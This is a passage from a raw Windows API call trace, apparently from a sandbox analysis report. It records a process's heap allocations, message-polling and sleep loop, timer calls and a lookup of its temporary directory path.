hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.337] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0310.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0310.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0310.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0310.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0310.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0310.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0310.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0310.338] timeGetTime () returned 0x4d7b7 [0310.338] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.338] Sleep (dwMilliseconds=0xa) [0310.347] timeGetTime () returned 0x4d7c7 [0310.347] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.347] Sleep (dwMilliseconds=0xa) [0310.362] timeGetTime () returned 0x4d7d6 [0310.362] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.362] Sleep (dwMilliseconds=0xa) [0310.379] timeGetTime () returned 0x4d7e6 [0310.379] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.379] Sleep (dwMilliseconds=0xa) [0310.393] timeGetTime () returned 0x4d7f5 [0310.394] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.394] Sleep (dwMilliseconds=0xa) [0310.409] timeGetTime () returned 0x4d805 [0310.409] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.409] Sleep (dwMilliseconds=0xa) [0310.425] timeGetTime () returned 0x4d815 [0310.425] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.425] Sleep (dwMilliseconds=0xa) [0310.440] timeGetTime () returned 0x4d824 [0310.440] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.440] Sleep (dwMilliseconds=0xa) [0310.456] timeGetTime () returned 0x4d834 [0310.456] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.456] Sleep (dwMilliseconds=0xa) [0310.472] timeGetTime () returned 0x4d843 [0310.472] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.472] Sleep (dwMilliseconds=0xa) [0310.487] timeGetTime () returned 0x4d853 [0310.487] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.487] Sleep (dwMilliseconds=0xa) [0310.503] timeGetTime () returned 0x4d863 [0310.503] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.503] Sleep (dwMilliseconds=0xa) [0310.518] timeGetTime () returned 0x4d872 [0310.518] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.518] Sleep (dwMilliseconds=0xa) [0310.534] timeGetTime () returned 0x4d882 [0310.535] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.535] Sleep (dwMilliseconds=0xa) [0310.550] timeGetTime () returned 0x4d891 [0310.550] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.550] Sleep (dwMilliseconds=0xa) [0310.565] timeGetTime () returned 0x4d8a1 [0310.565] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.565] Sleep (dwMilliseconds=0xa) [0310.581] timeGetTime () returned 0x4d8b1 [0310.581] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.581] Sleep (dwMilliseconds=0xa) [0310.596] timeGetTime () returned 0x4d8c0 [0310.596] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.596] Sleep (dwMilliseconds=0xa) [0310.620] timeGetTime () returned 0x4d8d0 [0310.620] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.620] Sleep (dwMilliseconds=0xa) [0310.628] timeGetTime () returned 0x4d8df [0310.628] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0310.628] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0310.628] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0310.628] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0310.628] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0310.628] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.628] Sleep (dwMilliseconds=0xa) [0310.643] timeGetTime () returned 0x4d8ef [0310.643] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.643] Sleep (dwMilliseconds=0xa) [0310.659] timeGetTime () returned 0x4d8ff [0310.659] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.659] Sleep (dwMilliseconds=0xa) [0310.674] timeGetTime () returned 0x4d90e [0310.675] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.675] Sleep (dwMilliseconds=0xa) [0310.690] timeGetTime () returned 0x4d91e [0310.690] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.690] Sleep (dwMilliseconds=0xa) [0310.705] timeGetTime () returned 0x4d92d [0310.706] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.706] Sleep (dwMilliseconds=0xa) [0310.721] timeGetTime () returned 0x4d93d [0310.721] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.721] Sleep (dwMilliseconds=0xa) [0310.737] timeGetTime () returned 0x4d94d [0310.737] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.737] Sleep (dwMilliseconds=0xa) [0310.754] timeGetTime () returned 0x4d95c [0310.754] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.754] Sleep (dwMilliseconds=0xa) [0310.768] timeGetTime () returned 0x4d96c [0310.768] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.768] Sleep (dwMilliseconds=0xa) [0310.784] timeGetTime () returned 0x4d97b [0310.784] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.784] Sleep (dwMilliseconds=0xa) [0310.799] timeGetTime () returned 0x4d98b [0310.799] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.799] Sleep (dwMilliseconds=0xa) [0310.816] timeGetTime () returned 0x4d99b [0310.816] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.816] Sleep (dwMilliseconds=0xa) [0310.830] timeGetTime () returned 0x4d9aa [0310.830] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.830] Sleep (dwMilliseconds=0xa) [0310.846] timeGetTime () returned 0x4d9ba [0310.846] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.846] Sleep (dwMilliseconds=0xa) [0310.862] timeGetTime () returned 0x4d9c9 [0310.862] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.862] Sleep (dwMilliseconds=0xa) [0310.877] timeGetTime () returned 0x4d9d9 [0310.877] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.877] Sleep (dwMilliseconds=0xa) [0310.893] timeGetTime () returned 0x4d9e9 [0310.893] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.893] Sleep (dwMilliseconds=0xa) [0310.908] timeGetTime () returned 0x4d9f8 [0310.908] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.908] Sleep (dwMilliseconds=0xa) [0310.924] timeGetTime () returned 0x4da08 [0310.924] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.924] Sleep (dwMilliseconds=0xa) [0310.940] timeGetTime () returned 0x4da17 [0310.940] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.940] Sleep (dwMilliseconds=0xa) [0310.968] timeGetTime () returned 0x4da27 [0310.968] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.968] Sleep (dwMilliseconds=0xa) [0310.971] timeGetTime () returned 0x4da37 [0310.971] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.971] Sleep (dwMilliseconds=0xa) [0310.986] timeGetTime () returned 0x4da46 [0310.986] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0310.986] Sleep (dwMilliseconds=0xa) [0311.002] timeGetTime () returned 0x4da56 [0311.002] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.002] Sleep (dwMilliseconds=0xa) [0311.018] timeGetTime () returned 0x4da65 [0311.018] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.018] Sleep (dwMilliseconds=0xa) [0311.033] timeGetTime () returned 0x4da75 [0311.033] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.033] Sleep (dwMilliseconds=0xa) [0311.049] timeGetTime () returned 0x4da85 [0311.049] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.049] Sleep (dwMilliseconds=0xa) [0311.065] timeGetTime () returned 0x4da94 [0311.065] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.066] Sleep (dwMilliseconds=0xa) [0311.080] timeGetTime () returned 0x4daa4 [0311.080] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.080] Sleep (dwMilliseconds=0xa) [0311.096] timeGetTime () returned 0x4dab3 [0311.096] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.096] Sleep (dwMilliseconds=0xa) [0311.111] timeGetTime () returned 0x4dac3 [0311.111] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.111] Sleep (dwMilliseconds=0xa) [0311.127] timeGetTime () returned 0x4dad3 [0311.127] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.127] Sleep (dwMilliseconds=0xa) [0311.142] timeGetTime () returned 0x4dae2 [0311.142] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.142] Sleep (dwMilliseconds=0xa) [0311.158] timeGetTime () returned 0x4daf2 [0311.158] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.158] Sleep (dwMilliseconds=0xa) [0311.174] timeGetTime () returned 0x4db01 [0311.174] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.174] Sleep (dwMilliseconds=0xa) [0311.189] timeGetTime () returned 0x4db11 [0311.189] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.190] Sleep (dwMilliseconds=0xa) [0311.207] timeGetTime () returned 0x4db21 [0311.207] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.207] Sleep (dwMilliseconds=0xa) [0311.220] timeGetTime () returned 0x4db30 [0311.220] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.220] Sleep (dwMilliseconds=0xa) [0311.236] timeGetTime () returned 0x4db40 [0311.236] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.236] Sleep (dwMilliseconds=0xa) [0311.254] timeGetTime () returned 0x4db4f [0311.254] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.254] Sleep (dwMilliseconds=0xa) [0311.267] timeGetTime () returned 0x4db5f [0311.267] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.267] Sleep (dwMilliseconds=0xa) [0311.283] timeGetTime () returned 0x4db6f [0311.283] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.283] Sleep (dwMilliseconds=0xa) [0311.299] timeGetTime () returned 0x4db7e [0311.299] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.299] Sleep (dwMilliseconds=0xa) [0311.314] timeGetTime () returned 0x4db8e [0311.314] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.314] Sleep (dwMilliseconds=0xa) [0311.330] timeGetTime () returned 0x4db9d [0311.330] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.330] Sleep (dwMilliseconds=0xa) [0311.345] timeGetTime () returned 0x4dbad [0311.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0311.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0311.345] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0311.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0311.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0311.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0311.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0311.347] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0311.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0311.347] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0311.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0311.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0311.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.348] 